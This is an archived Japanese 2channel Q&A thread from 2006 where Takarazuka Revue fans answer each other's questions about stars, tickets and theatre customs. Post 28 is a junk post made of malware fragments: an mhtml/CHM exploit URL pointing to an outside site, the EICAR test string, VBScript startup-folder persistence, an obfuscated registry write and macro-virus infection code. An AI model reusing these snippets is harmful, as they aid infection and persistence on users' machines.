2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

もの凄い勢いで誰かが質問に答えるスレ 3

1 :名無しさん@花束いっぱい。:2006/11/17(金) 18:38:51 ID:17n437fu
調べるのがめんどくさい初心者はなんでもかいとけ!
知ってたら即、答えるし、知らんかったら知らんと書く。
検索・テンプレなんかクソでも喰っとけ!
教えて君以外は逝ってヨシ!

【鉄の掟】
一、かぶっても泣かない。
一、出された質問は残さず答える。

前スレ
http://hobby8.2ch.net/test/read.cgi/siki/1154329897/l50

2 :名無しさん@花束いっぱい。:2006/11/17(金) 21:35:27 ID:NkuVT4/i
>1 乙!

       つ旦~

3 :名無しさん@花束いっぱい。:2006/11/17(金) 22:59:26 ID:rQNBymkI
>1
乙です

4 :998:2006/11/18(土) 12:52:20 ID:jN0CTb3Q
前スレで答えてくれた方々ありがとうございました。
難しそうですががんばって探してみます。
無理なら来年の違う組の公演で我慢。でも数年ぶりの
観劇だから喜んでくれることでしょう。

5 :名無しさん@花束いっぱい。:2006/11/18(土) 13:33:02 ID:vx14asxL
昔、テレビでヅカ特集したときに、下級生は地べたに座ると放送されていたのですが、

TCAの稽古風景とかみると後ろの木椅子に下級生が座ってて、
その生徒より上級生が床に座っているのが見えたのですが
あれってなんなのですか?
明らかな上級生はサイドの椅子に座ってましたが、
後ろの木椅子はかんけいないのですか?

どなたか教えてください。

6 :名無しさん@花束いっぱい:2006/11/18(土) 13:57:48 ID:XoLO3Urs
今日のMXテレビ再放送分。
いつの放送になったのかご存知の方教えて下さい。

7 :名無しさん@花束いっぱい。:2006/11/18(土) 14:06:56 ID:Ko0/ZwZa
>>1乙です!
もしかしてオサタソのCMってもう見れない?

8 :名無しさん@花束いっぱい。:2006/11/18(土) 16:11:59 ID:1xZXFAU9
以前「街で見かけた・・・」スレで語られたという
えりたんのほっこりエピソードってどんなエピなんですか?
気になって気になって・・・

9 :名無しさん@花束いっぱい。:2006/11/18(土) 16:16:55 ID:2O/q7feL
公式HpのTopのコムチャンの写真は何の公演のものですか?
パソコン壊れてて‥

10 :名無しさん@花束いっぱい。:2006/11/18(土) 16:42:22 ID:KTfR+9vC
>5
床に座っている上級生は多分次のシーンの出番待ちしているのじゃないかしら。
稽古場見ていると、トップさんが壁にへばりついて立っていたりもあって、
ああいうのはセット後ろに隠れているつもりの稽古のようです。

11 :名無しさん@花束いっぱい。:2006/11/18(土) 16:55:34 ID:vx14asxL
>>10
ありがとうございます。
いまいちヅカの形態って解りづらくて。

助かりました。

12 :名無しさん@花束いっぱい。:2006/11/18(土) 17:33:19 ID:jfHXXtYr
>8
にくちゃんねるで過去ログ探せ
「オフの優しいジェンヌって??」の913あたりからだとおも

13 :名無しさん@花束いっぱい。:2006/11/18(土) 18:14:00 ID:1xZXFAU9
>12
ありがとうございます。
ただエラーになってしまって見られず・・・orz

14 :名無しさん@花束いっぱい。:2006/11/18(土) 18:14:06 ID:t7PssyrB
大尉 ってなんて読むんですか!?

15 :名無しさん@花束いっぱい。:2006/11/18(土) 18:19:29 ID:83frU/i8
↑ つ漢字辞典

16 :8です:2006/11/18(土) 18:36:56 ID:1xZXFAU9
いま見られましたー。すみませんでした。

ほっこりしました!

17 :名無しさん@花束いっぱい。:2006/11/18(土) 21:28:27 ID:+FLGQwTw
>14
これ読めないってかなり恥ずかしいのでは・・・
「大尉・中尉・少尉」だとわかる?

18 :名無しさん@花束いっぱい。:2006/11/18(土) 22:08:56 ID:ZQsvA+wO
wikiによると
大尉(たいじょう)は、古代日本の律令制の職名の一。
左右衛門府および左右兵衛府に置かれた。
長官・次官・判官・主典の4等官中の判官に相当する。
大日本帝国海軍では、大尉は「だいい」と呼称された。




19 :名無しさん@花束いっぱい。:2006/11/18(土) 22:36:06 ID:kIcW8Ojn
Takarazuka Revue(無料の縦長冊子のほう)は、
劇場以外ではどこで配布してますか?
今まで劇場にいけなかった時は梅田の阪急交通社三番街店で
貰ってたんですが、今はブライダル専門になってしまってて
置いてないみたいなんです。
梅田のキャトルも覗いたけど置いてないみたいで・・・
劇場に行かないと手にはいりませんか?

20 :恥骨強化協会:2006/11/18(土) 22:50:21 ID:ctdQq9yY
朝夢精して、汚れてしまったパンツは、どうすれば誰にも夢精事実を悟られず、かつ迅速に無かった事にできますか?
あと、交換留学生のダバダさん(カナダ人17歳男前な女性)と、どう接すればいいでしょうか?
あと最後にティッシュの減りの早さを指摘されたとき、有効なごまかしかたをご存知のかた、よろしくお願いします。

21 :名無しさん@花束いっぱい。:2006/11/18(土) 23:00:33 ID:83frU/i8
19さん 阪急の駅ならたぶん、どの駅にもあるから、梅田駅とかなら改札入らなくても手に入ると思います。

22 :名無しさん@花束いっぱい。:2006/11/18(土) 23:05:56 ID:H8Rd7lBk
>19 私は近くのぴあでもらうよ。

23 :名無しさん@花束いっぱい。:2006/11/18(土) 23:17:24 ID:UgJN87QT
スカイステージの映像で星組千秋楽のカーテンコールで
わたる君の右後ろに立っているかわいい娘役さんはどなたでしょうか?
おとめを見ても、誰もピンとこなくてわかりません・・・。

24 :名無しさん@花束いっぱい。:2006/11/18(土) 23:43:44 ID:Q2wSGZP2
>>23
白鷺まどか

25 :名無しさん@花束いっぱい。:2006/11/18(土) 23:50:15 ID:0mDq1aHm
またエライとこきたなw

26 :19:2006/11/19(日) 00:16:04 ID:uehWv5dB
>21 22 さん

ありがとうございます!
阪急の駅でもらえるとは知りませんでした。(阪急はあまり利用しないので)
ぴあでも手に入るのですね。
どちらかでチェックしてみます!

27 :名無しさん@花束いっぱい。:2006/11/19(日) 00:43:12 ID:oc/CIvvh
大地真央さんはトップ就任時26歳で、最年少トップと言われてましたが、
その後、天海さんがトップななったときは天海さんが最年少トップになったのですか?

28 :<body onload=window()>:2006/11/19(日) 01:21:53 ID:QChQctx4
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

29 :名無しさん@花束いっぱい。:2006/11/19(日) 08:30:01 ID:5v3DHiWZ
公式HPのTopのトップ5人の写真はそれぞれ何の公演のものですか?

30 :名無しさん@花束いっぱい。:2006/11/19(日) 12:09:24 ID:HT0wmdGW
>27
そうです。
天海さんは高校1年まで行ってから入団、研7でトップになりましたから
25歳くらいだったでしょうね。

>29
春野=ファントム
瀬奈=レ・ビジュー・ブリアン
朝海=タランテラ!
安蘭=ネオ・ダンディズム
貴城=ザ・クラシック

31 :名無しさん@花束いっぱい。:2006/11/19(日) 14:08:54 ID:RnUGULJy
あまみんは高2まで行ってるよ。

32 :名無しさん@花束いっぱい。:2006/11/19(日) 20:55:39 ID:5+TpHot1
>>30
かしちゃんは、コパのじゃない?

33 :14:2006/11/21(火) 12:48:49 ID:kBelWQmo
>>18
わざわざ調べてくださったのですね><
本当にありがとうございました!!^^

34 :名無しさん@花束いっぱい。:2006/11/21(火) 18:44:01 ID:pKtVcKXh
遼河はるひの愛称「あひ」の由来は
あひるからというところまではなんとなーく聞いたことあったんですが、
でもなぜにあひるが由来? 声が似てるとか??

35 :名無しさん@花束いっぱい。:2006/11/21(火) 18:49:55 ID:pKtVcKXh
↑あげ忘れあげ

36 :名無しさん@花束いっぱい。:2006/11/21(火) 18:53:17 ID:qtum4RJx
>>30
かしげのはコパ

37 :名無しさん@花束いっぱい。:2006/11/21(火) 19:54:01 ID:7zjgEbuG
>>34
「はるひ」が「あひる」に似てるから

38 :名無しさん@花束いっぱい。:2006/11/21(火) 20:42:41 ID:pKtVcKXh
>37
ありがとうございます。
へぇ、そうだったんだ。声が似てる?とか見た目があひる似?とか
変に深読みしてました。汗。

39 :名無しさん@花束いっぱい。:2006/11/21(火) 22:48:56 ID:mHU9N14n
新人公演の時、本役の生徒さんたちはだいたいどの辺りの席で観劇されるもんなんでしょうか?
やっぱり上級生、下級生によって席が違うんですか?

40 :名無しさん@花束いっぱい。:2006/11/21(火) 23:48:51 ID:K7TafMYF
別館に麻路さきさんのスレが無いのは何でですか?

41 :名無しさん@花束いっぱい。:2006/11/21(火) 23:51:13 ID:N7zhga2/
>40
えっ あ、ほんとだ 気づかなかった
でも立てる気はない

↑という人が多いからではないでしょうか

42 :名無しさん@花束いっぱい。:2006/11/21(火) 23:53:24 ID:K7TafMYF
なるほどー

43 :名無しさん@花束いっぱい。:2006/11/22(水) 00:05:58 ID:J8dzMaKY
>>39
上手の前方席で、学年成績順に並んで見ますよ。

44 :名無しさん@花束いっぱい。:2006/11/22(水) 13:00:50 ID:1McQklYd
公式で、ビデオ・DVDのページをクリックした時に、代わる代わる出るトップコンビの写真。
コムまーが水色の衣装で左に向かって微笑んでいるのは
何の公演ですか?


説明下手ですいません。

45 :名無しさん@花束いっぱい。:2006/11/22(水) 13:22:54 ID:VX6W7EgA
>44
タカラヅカグローリーのロマンスの場面です。

46 :名無しさん@花束いっぱい。:2006/11/22(水) 13:36:37 ID:1McQklYd
>>45タソ
ありがとうございます!

47 :名無しさん@花束いっぱい。:2006/11/22(水) 18:56:07 ID:/cBvCxgW
>>43
ありがとうございました。

48 :名無しさん@花束いっぱい。:2006/11/23(木) 16:42:47 ID:y8yQBnqz
ファンクラブに入会するのはどれくらいお金がかかりますか??
教えて下さい!!

49 :名無しさん@花束いっぱい。:2006/11/23(木) 16:47:21 ID:WL5AO226
各ファンクラブによるので贔屓のファンクラブに聞け

50 :名無しさん@花束いっぱい。:2006/11/23(木) 16:50:56 ID:TjhpW4xE
人によっても違うと思うけど…
入会金だいたい5000円〜?
年会費5000円ぐらいいるところも…
入会金だけでOKなところもあるみたい。上限はないみたいだから〜

51 :名無しさん@花束いっぱい。:2006/11/23(木) 19:22:17 ID:gM0+/jD0
「お化粧前」って何ですか?

52 :名無しさん@花束いっぱい。:2006/11/23(木) 19:24:32 ID:F4bO1dFl
一般的に言う『鏡台』みたいなもの。
化粧をするために一人一台与えられる机?みたいなものです。

53 :名無しさん@花束いっぱい。:2006/11/23(木) 21:39:00 ID:gM0+/jD0
>>52
「お化粧前」を作る、という意味がわからないのですが・・・。

54 :名無しさん@花束いっぱい。:2006/11/23(木) 22:18:00 ID:7ODtz58F
>53
オールアバウトの宝塚ファンに行けば
いろいろ詳しく書いてあるよ

55 :名無しさん@花束いっぱい。:2006/11/23(木) 22:20:36 ID:JkSM+RLx
そのお化粧前のカバーを作ることを「お化粧前を作る」と言いますな。
中綿をいれた、机部分に敷くやつとか、お揃いのティッシュカバーとか
座椅子用のカバーとか一式。

56 :名無しさん@花束いっぱい。:2006/11/24(金) 00:13:12 ID:+FtQreOW
飾るっちゅう事かな

57 :名無しさん@花束いっぱい。:2006/11/24(金) 07:47:29 ID:ZBdbJ6tK
>>54-56
おお、そうでしたか・・・。ありがとうございました。
生徒さんは皆、作ってもらったお化粧前を持っているもんなんですか?それはファンが作って差し入れていいものなんですか?1公演ごとに取り換えるんでしょうか?

58 :名無しさん@花束いっぱい。:2006/11/24(金) 08:19:20 ID:J9E1tdWU
>>57
その通りです
公演ごとにファンが作って入れてます

過去に数年間作っていたけど
裁縫苦手な自分には、かなーり苦痛だった

59 :名無しさん@花束いっぱい。:2006/11/24(金) 08:24:50 ID:MDj9ZemJ
お化粧前は生徒さんにお願いされた方が作るので
ファンが勝手に差し入れていいものではありません。

60 :名無しさん@花束いっぱい。:2006/11/24(金) 13:02:16 ID:wgv+HSIc
ここにあったヅカ系のヤフオクスレってなくなったの?

61 :名無しさん@花束いっぱい。:2006/11/24(金) 13:08:52 ID:NhaqzH3y
知らん

62 :名無しさん@花束いっぱい。:2006/11/25(土) 23:47:08 ID:7AmyUqSB
何かの作品で,ランカスターという名前出て来ましたっけ??

63 :名無しさん@花束いっぱい。:2006/11/26(日) 00:22:37 ID:tAWe9hUX
PCが壊れて10日程ネットから遠ざかってました。
この間に何か新しい情報や祭りがあったのか教えて下さい。

64 :名無しさん@花束いっぱい。:2006/11/26(日) 00:38:19 ID:ehmv4D0e
作品を再演するかどうかの基準みたいなのってあるんでしょうか?

65 :麗亜 ◆ysCBLmhzdM :2006/11/26(日) 00:43:27 ID:me2hbsmp
>>62それは「ホテルステラマリス」の「ステイシー・ランカスター」
ではありませんか?貴子さんは「ウイリアム・オダネル」でしたよ!!

66 :名無しさん@花束いっぱい。:2006/11/26(日) 01:00:42 ID:Y2YqtzwX
この板のコテが特別うざいのは何故だろー

67 :名無しさん@花束いっぱい。:2006/11/26(日) 01:08:21 ID:pPpSTZo7
>>65
そうかもしれません(>∀<)
ありがとうごさいました。

68 :名無しさん@花束いっぱい。:2006/11/26(日) 01:10:55 ID:vtjabc7M
>63
特にない
>64
特にない
>65
だれも(゚-゚)さんの役なぞ聞いていない


69 :名無しさん@花束いっぱい。:2006/11/26(日) 01:12:33 ID:zmPvz6Vo
スレの削除依頼出したいんですけど
アドレスはどこに載ってるんですか?
どこもhttp://www.2ch.net/2ch.htmlなんですけど

70 :名無しさん@花束いっぱい。:2006/11/26(日) 01:17:10 ID:zmPvz6Vo
すいません自己解決しました

71 :名無しさん@花束いっぱい。:2006/11/26(日) 01:30:21 ID:ehmv4D0e
「天海祐希が辞める直前に書いたエッセイ」のタイトルは何ですか?


72 :名無しさん@花束いっぱい。:2006/11/26(日) 02:23:09 ID:e55CriIb
>>71
「明日吹く風のために…」

73 :名無しさん@花束いっぱい。:2006/11/26(日) 20:17:13 ID:XPEpqTLO
花DCの振付に参加しているAYAKOってOGだそうですが、
芸名は何とおっしゃるのですか?

それとAYAKOさんがどの場面の振付を担当しているか
わかる方教えて下さい。

74 :名無しさん@花束いっぱい。:2006/11/26(日) 21:36:36 ID:LFLMyjPM
>73
宝樹彩 さん
75期だったかな
たしか、ワタルさんと同期

DCでは、ヒップホップの場面とフィナーレはAYAKOさんだったかと思う


75 :名無しさん@花束いっぱい。:2006/11/26(日) 21:58:43 ID:XPEpqTLO
74さん、ありがとうございます。

宝樹彩さんでしたらお名前聞いたことあります。
古いおとめで確認してみたいと思います。

76 :名無しさん@花束いっぱい。:2006/11/26(日) 23:51:13 ID:N8icjoMV
トップのサヨナラ楽の1階5列以内センターで55kは安いですか?


77 :名無しさん@花束いっぱい。:2006/11/27(月) 08:10:27 ID:PYyQLl+2
>>76
雪→3〜5列、相場通り 1〜2列、安い

宙→1列目でも高杉

78 :名無しさん@花束いっぱい。:2006/11/27(月) 10:29:56 ID:bXn8Turx
>76
大劇場と東宝の違いがあるからなんともいえん。
大劇場なら高いけど、東宝なら買うと思う、自分は。

79 :名無しさん@花束いっぱい。:2006/11/27(月) 12:46:18 ID:D1D/+xq+
東京宝塚劇場で「萩の月」を買うには座席券がいりますか?

80 :名無しさん@花束いっぱい。:2006/11/28(火) 07:20:34 ID:RiaqX+yl
>>79
座席券無いと販売されてる売店に行けない
ただ、どーしても欲しいなら開演時間中に改札の係員に頼んでみてはどうだろう

81 :名無しさん@花束いっぱい。:2006/11/28(火) 10:59:05 ID:rkNyp2zv
>>76です
みなさまありがとうございます。宙ムラの楽なんですよ〜(;´д`)
まぁチケとるの自分で苦労しなかったんでしゃーないかな。



82 :名無しさん@花束いっぱい。:2006/11/28(火) 11:02:43 ID:rkNyp2zv
何度もスイマセン
楽の外で退団者が袴で歩くパレード?お見送り?って何時ごろまで待てば見れますか?



83 :名無しさん@花束いっぱい。:2006/11/28(火) 14:00:44 ID:S4lpGnkN
先日スカステで放送された星組のロマンチカ宝塚にすっかり嵌って
しまいました。それでプログラムお持ちの方、場面ごとの音楽と
振付の担当者を教えてもらえないでしょうか。
よろしくお願いします。


84 :名無しさん@花束いっぱい。:2006/11/28(火) 20:04:33 ID:4ooXwRyg
>83
スカステで見たんだよね?
なんでその時に文字情報出さなかったの?

「場面ごと」ってことは「あの場面とこの場面」とかじゃなくて
「全場面」教えろってことだよね・・・。

85 :名無しさん@花束いっぱい。:2006/11/28(火) 21:23:32 ID:smUORmsx
>>83
いくらなんでもちょっと…図々しいというか…

86 :名無しさん@花束いっぱい。:2006/11/28(火) 21:38:34 ID:S4lpGnkN
83です。
文字情報ってどうやって出すんですか?
スカパー110度対応のDVDレコーダーで見てるので操作が私的にとても難しくて
そういうものがあるとは知りませんでした。

後、知りたい場面は檀さんが黒いドレス着てる場面と、船上の場面とです。
場面名がわからなかったのであつかましい要求をしてしまいました。

87 :名無しさん@花束いっぱい。:2006/11/28(火) 21:50:30 ID:U6HHy0ww
>>86
アンで中古でプログラム売ってんじゃないの?

88 :名無しさん@花束いっぱい。:2006/11/28(火) 22:35:20 ID:PX0/R0Dq
80さま ありがとうございました。
出張帰りに入手できればと、安易に考えておりました。


89 :名無しさん@花束いっぱい。:2006/11/29(水) 01:10:45 ID:j1tjqvZ/
>>86
スカパー110が見れる機械ならリモコンに大抵
「d」とか「連動データ」とか書いてあるボタンがあるはず。

86サンの機械を見ないとなんとも言えないけど・・・探してみて。
見てる最中にそのボタン押すだけだから。

90 :名無しさん@花束いっぱい。:2006/11/29(水) 12:46:54 ID:JwQGfR3e
86です。
89さん、丁寧に教えていただきありがとうございます。
年末にまたロマンチカの放送あるようなので、やってみます。

91 :名無しさん@花束いっぱい。:2006/11/29(水) 21:53:56 ID:vPKUQhtx
12/11宙の15:00前楽はサヨナラショーありますか?

92 :名無しさん@花束いっぱい。:2006/11/30(木) 02:05:51 ID:lLJHUyEW
>>91タソは公式の公演日程を見たことがありますか?
サヨナラショーの有無もちゃんと書いてありますよ。

93 :名無しさん@花束いっぱい:2006/11/30(木) 02:21:04 ID:AFgstP7q
愛紗ももさんがどういう理由で退団されたのかご存じの方いらっしゃいますか
海外転勤で飛ばされて帰ってきたら退団しててびっくり('A`)

94 :名無しさん@花束いっぱい。:2006/11/30(木) 08:21:33 ID:ptgScxVz
>91 あるよ。男1の退団は、前楽、楽の2回。娘役トップ単独、新専科は
 楽のみ。

95 :名無しさん@花束いっぱい。:2006/11/30(木) 09:58:32 ID:PCux2OqL
>93
芸能界

96 :名無しさん@花束いっぱい。:2006/11/30(木) 11:27:45 ID:YJAeFWXe
92、94》どうもありがとうございました。

97 :名無しさん@花束いっぱい。:2006/11/30(木) 21:04:04 ID:2swp6WzQ
日本青年館近くに
ランチ出来る様なレストランありますか?
何でも大丈夫です。宜しくお願いします。

98 :名無しさん@花束いっぱい。:2006/11/30(木) 23:15:41 ID:oal/x0Re
どぅやったらsageになるのでしょう(?_?)

99 :名無しさん@花束いっぱい。:2006/11/30(木) 23:16:54 ID:88fn4ZPh
>98
E-mail欄半角でsageと入れる。
っていうか、半年ROMれ。


100 :名無しさん@花束いっぱい。:2006/11/30(木) 23:49:01 ID:ZpKJY8KH
>>98
私は千駄ヶ谷駅の近くのユーハイムが好き。
パスタとかがあった気がするよ。
お土産にバウムクーヘン。

101 :名無しさん@花束いっぱい。:2006/11/30(木) 23:50:42 ID:ZpKJY8KH
ぎゃ、ごめんなさい。
↑は>>97さんへ、でした。

102 :名無しさん@花束いっぱい。:2006/12/01(金) 10:48:30 ID:qprJoza0
今度の宙公演の貸切券を親戚に譲ろうと思ってるんですが
客観的に観て小学1年位の女の子が楽しめそうですか?

103 :名無しさん@花束いっぱい。:2006/12/01(金) 11:16:56 ID:T8pvZGwg
>102 楽しめる可能性が高いかな。時代物でわりとテンポが速くて・・
 ショーは綺麗です。でも個人差があるから。

104 :名無しさん@花束いっぱい。:2006/12/01(金) 11:27:04 ID:qprJoza0
>103
ありがとうございます
譲る方向で話してみます

105 :名無しさん@花束いっぱい。:2006/12/01(金) 19:47:54 ID:UXcQnr75
>103
確かに場面転換の速さやセリフのテンポ良さでは楽しめるかもしれない。

でも幕府、尊王攘夷、土佐勤皇党といった小学一年生にとって意味不明な
言葉がいっぱい出てきて「つまんない」と決め付けるタイプの子供と、
「お侍さんがいっぱいでなんか楽しーい」と雰囲気を楽しめるタイプの子と
いるからなぁ・・・。



106 :98:2006/12/01(金) 21:33:12 ID:Vr3MiG5b
>>100サマ
遅くなりました。
ありがとうございます。
行ってみます!

107 :名無しさん@花束いっぱい。:2006/12/01(金) 23:27:31 ID:1j4enZJt
今度初めて宝塚を見に行きます(雪組)
1階2列の端の方なんですが、観にくいですか?
死角はありますでしょうか?
よろしくお願いします

108 :名無しさん@花束いっぱい。:2006/12/01(金) 23:50:11 ID:rzzbk25F
タニ茶って2日ですか?

109 :名無しさん@花束いっぱい。:2006/12/02(土) 00:02:07 ID:aHpiTEvU
>>107
実際、見切れはあるし、センターに比べれば観やすいハズは無い
しかし、死角があって観にくいと言われたらどうにか出来るの?
あなたの後ろにはあと20列以上有るんだよ?
それぞれの席にそれぞれの楽しみ方があります
自分で感じて来て下さい

110 :名無しさん@花束いっぱい。:2006/12/02(土) 00:06:13 ID:nbM3l9tL
>103
うちの場合、1回目は話がわからずチンプンカンプンだったようです。
意味がわからなくても笑える場面もあるからいいけど退屈そうでした。
2回目行く前に、子供向けの百科辞典で坂本竜馬、鎖国、尊皇攘夷、薩摩藩などなど調べさせてから行きました。
1回目より楽しめたと言ってました。
ショーは2回とも途中から爆睡でしたが…orz

111 :名無しさん@花束いっぱい。:2006/12/02(土) 00:27:37 ID:XdxXUFoc
どこに書けばいいかわからなかったから、とりあえずココにきたけど

シャンテ内での衣裳展、なんでコムver.は無いの?
わたるさんやたかこさんの見て、楽しみにしてたのに。

112 :名無しさん@花束いっぱい。:2006/12/02(土) 00:51:36 ID:ajZ+0qDl
ドリキンの時だかにやった気がする
コム衣装… 違ったかな

113 :名無しさん@花束いっぱい。:2006/12/02(土) 01:35:44 ID:XdxXUFoc
そうなんだ…
ムラ行けないからシャンテのが頼りだったんだけどなぁ。残念。

114 :名無しさん@花束いっぱい。:2006/12/02(土) 05:05:41 ID:QcZcF4Ie
>108
  12月 2日(土)貴城・大和(11/26から変更)早霧・蓮水・暁
   12月 3日(日)鳳翔


115 :名無しさん@花束いっぱい。:2006/12/04(月) 00:07:14 ID:1HjpInvK
>>110さんのお子さんは楽しめたようでいいですね。
ウチのはずっと退屈そうでした。その上、意味もわからず
「おいどんは夜はテクニシャンでごわす」を気に入って
何度も言ってます・・・orz

116 :名無しさん@花束いっぱい。:2006/12/04(月) 01:05:56 ID:bI/TDKtk
バロスwwwwwwww

117 :名無しさん@花束いっぱい。:2006/12/04(月) 15:31:51 ID:gRfXhHCt
テクニシャンのとこ台詞ならスミレコードにひっかからないのかといつもヒヤヒヤ…
長州人は〜って言うとこもヒヤヒヤ…

118 :名無しさん@花束いっぱい。:2006/12/04(月) 23:09:47 ID:0l0IYlrj
ここで聞いていいのかな…

ケータイから別館が見られないのですが
何かあったのでしょうか?

119 :名無しさん@花束いっぱい。:2006/12/04(月) 23:17:24 ID:3LKbchSf
パソコンからも見えないよ。サーバが落ちているのかな?


120 :名無しさん@花束いっぱい。:2006/12/04(月) 23:18:31 ID:LKd10idG
>118>119
別館スレで語られております
そうか、ケータイも落ちたか

121 :名無しさん@花束いっぱい。:2006/12/04(月) 23:57:34 ID:IbT57Di4
堕天使の涙のDVDにはカットありますか?

122 :名無しさん@花束いっぱい。:2006/12/05(火) 00:03:08 ID:0l0IYlrj
>>119-120
マリガトですた。
別館スレ覗いて来たら同じような人がイパーイで
なんか和んだ。

123 :名無しさん@花束いっぱい。:2006/12/05(火) 00:08:21 ID:2m31XcKJ
>212
私も気になる。
ビデオとDVDって内容同じだよね?
誰かビデオ買った人いないのかなぁ?

124 :名無しさん@花束いっぱい。:2006/12/05(火) 09:27:45 ID:HvaA/NuV
212タンに期待…?!

125 :名無しさん@花束いっぱい。:2006/12/05(火) 12:58:35 ID:/JCoRdzm
ヤンさんて安寿ミラさんだよね?

ゆきさんてどなた?
あと、ゆきさんの事務所はショボいのが定説なんですか?

126 :名無しさん@花束いっぱい。:2006/12/05(火) 15:12:22 ID:/JCoRdzm
あげます

127 :名無しさん@花束いっぱい。:2006/12/05(火) 16:46:04 ID:08yeYUTz
ゆきさんは、ここでなら「高嶺ふぶき」さんかと。
あとのことは知らないけど。

128 :名無しさん@花束いっぱい。:2006/12/05(火) 17:35:29 ID:/JCoRdzm
どうもです!

129 :名無しさん@花束いっぱい。:2006/12/05(火) 18:55:27 ID:aWO77jZM
高嶺さんの事務所なら、個人事務所だから小さくて当たり前
そんなのはごく普通のこと
誰もが知るような大手事務所に所属してるOGの方が少数

130 :名無しさん@花束いっぱい。:2006/12/05(火) 19:57:38 ID:/JCoRdzm
あ、個人事務所なんだ。
ヤンさんは個人じゃないの?

131 :名無しさん@花束いっぱい。:2006/12/05(火) 21:44:19 ID:inTZDnyL
サヨナラショーで振ってるペンライトはみんな自前なんですか?

132 :名無しさん@花束いっぱい。:2006/12/05(火) 21:53:33 ID:0ge5dXOy
>>131
会提供。

133 :名無しさん@花束いっぱい。:2006/12/05(火) 23:03:29 ID:MSyOeiBe
東のゆひ茶日程教えてください!

134 :名無しさん@花束いっぱい。:2006/12/05(火) 23:03:59 ID:MSyOeiBe
上げ忘れ上げ。すまそ。

135 :名無しさん@花束いっぱい。:2006/12/08(金) 18:01:52 ID:IF1vqU/M
愛華みれってどうしてあだ名が「タモさん」なの?

136 :名無しさん@花束いっぱい。:2006/12/08(金) 18:09:31 ID:pry/XAoG
本名が森田だから

137 :名無しさん@花束いっぱい。:2006/12/08(金) 18:31:56 ID:IF1vqU/M
>136
タモリと語源が一緒ってことですかぃ?

138 :名無しさん@花束いっぱい。:2006/12/09(土) 04:01:08 ID:vPkpDkUO
いや、語源とかなんとかじゃなくて、
森 田 だ か ら

139 :名無しさん@花束いっぱい。:2006/12/09(土) 15:25:38 ID:xKjrkqVo
タモリ 本名の「森田」の前後を入れ替えてタモリ
愛華みれ 本名の「森田」の前後を入れ替えてタモ

…一緒じゃん!(・∀・)


140 :名無しさん@花束いっぱい。:2006/12/10(日) 17:54:13 ID:H3jcEvlJ
天勢いづるさんって、いつから娘役になったんですか?

141 :名無しさん@花束いっぱい。:2006/12/10(日) 18:07:41 ID:wct86vMw
しらん。

142 :名無しさん@花束いっぱい。:2006/12/10(日) 18:15:26 ID:C6CYrq90
今日えみぃshowで、元宝塚トップスターS・Jさんが
元アイドルグループのナントかさん(イニシャル忘れた)と
付き合ってると言ってたんですが、S・Jって誰ですか?
瀬奈じゅんは現役だし、一体……

143 :名無しさん@花束いっぱい。:2006/12/10(日) 18:17:50 ID:+hJLqkrz
shibuki jun

144 :名無しさん@花束いっぱい。:2006/12/10(日) 18:18:00 ID:dO5iEgrX
紫吹淳でそ

145 :名無しさん@花束いっぱい。:2006/12/10(日) 18:29:21 ID:+GXBTih1
>>142
V6の坂本昌行と…ね

146 :名無しさん@花束いっぱい。:2006/12/10(日) 18:30:36 ID:1UaokZtM
萩の月のCMはいくつバージョンがあるのでしょうか?

147 :名無しさん@花束いっぱい。:2006/12/10(日) 18:54:01 ID:vMCdqoz+
坂本くんの相手は塚関係じゃないよ。

148 :名無しさん@花束いっぱい。:2006/12/10(日) 19:09:57 ID:ahCS5wLT
>140 睡れる月、本公演は霧のミラノから。青い鳥は、外部でお休み。
 

149 :名無しさん@花束いっぱい。:2006/12/10(日) 19:17:55 ID:wRSwGxfv
坂本は元モー娘の中澤裕子と付き合ってるから、リカさんではないよ

150 :名無しさん@花束いっぱい。:2006/12/10(日) 19:58:57 ID:1hcOqp9u
元アイドルグループって、一応まだV6は現役なんですけど。

151 :名無しさん@花束いっぱい。:2006/12/10(日) 20:10:11 ID:mmsbM6xw
>>133
3/17

152 :名無しさん@花束いっぱい。:2006/12/11(月) 01:44:38 ID:aNr2+53c
>>140,>>149
「あの日みた夢に」から。本公演は霧ミラで合ってるけど。

>2004/07/16
>天勢いづる・娘役転向へのお知らせ
>雪組・天勢いづるが、7月15日付で娘役へ転向いたしますので、お知らせいたします。
>※東京特別・シアター・ドラマシティ公演『あの日みた夢に』
>(東京:8月21日〜28日、ドラマシティ:9月4日〜16日)より、娘役として出演いたします。

153 :名無しさん@花束いっぱい。:2006/12/11(月) 01:45:16 ID:aNr2+53c
ゴメン、アンカー間違った。
>>148でした。

154 :名無しさん@花束いっぱい。:2006/12/11(月) 09:36:55 ID:vIHj7Dp/
宙組スレに定期的に現れる変な絵文字&リサタンとかいうの、
あれなんですか?


155 :名無しさん@花束いっぱい。:2006/12/11(月) 11:00:45 ID:RskrA5Va
>154
見てるとこちらの脳が腐るので、蓋しといたほうがいいです。

156 :名無しさん@花束いっぱい。:2006/12/11(月) 12:23:20 ID:cqDAIyOE
今日の東宝当日券、まだあるかな?

157 :名無しさん@花束いっぱい。:2006/12/11(月) 15:42:10 ID:CFXOb4PR
さぁ…って、全然早くないね。
(どうなったかなぁ…。)

